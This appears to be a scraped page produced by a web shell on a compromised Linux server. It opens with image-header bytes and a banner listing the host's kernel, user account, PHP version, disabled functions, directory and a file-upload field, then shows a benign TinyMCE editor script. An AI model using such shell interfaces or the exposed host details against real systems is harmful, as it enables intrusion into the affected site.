ÿØÿà JFIF ` ` ÿþ
Server : Apache/2 System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 User : benhviencoc7 ( 1008) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/benhviencoc7/public_html/data/javascripts/tinymce/ |
Upload File : |
$(document).ready(function(){ tinymce.init({ selector: "#Editor", theme: "modern", menubar: true, language : 'vi_VN', relative_urls : false, remove_script_host : false, convert_urls : true, plugins: [ "advlist autolink link image lists charmap print preview hr anchor pagebreak spellchecker", "searchreplace wordcount visualblocks visualchars code fullscreen insertdatetime media nonbreaking", "save table contextmenu directionality emoticons template paste textcolor" ], toolbar: "textarea undo redo | styleselect | fontsizeselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | code | unlink link insert_image | print preview media fullpage | forecolor backcolor emoticons", setup : function(ed) { // Register example button ed.addButton('insert_image', { title : 'Chèn ảnh', image : '../data/javascripts/tinymce/icons/insert_picture.gif', onclick : function() { // ed.windowManager.alert('Hello world!! Selection: ' + ed.selection.getContent({format : 'text'})); $.showAkModal(popupsDir + 'insert_image.php?wysiwyg=20&type=up','Image',450,400); } }); } }); $('.product-images a.remove').live('click', function(){ var url = $(this).closest('tr').attr('data-url'); var value = $('input[name=attach_image]').val(); $('input[name=attach_image]').val(value.replace(url + ',', '')); $(this).closest('tr').remove(); }); }); function insertHtml(html, id){ tinyMCE.activeEditor.execCommand('mceInsertContent', false, html); }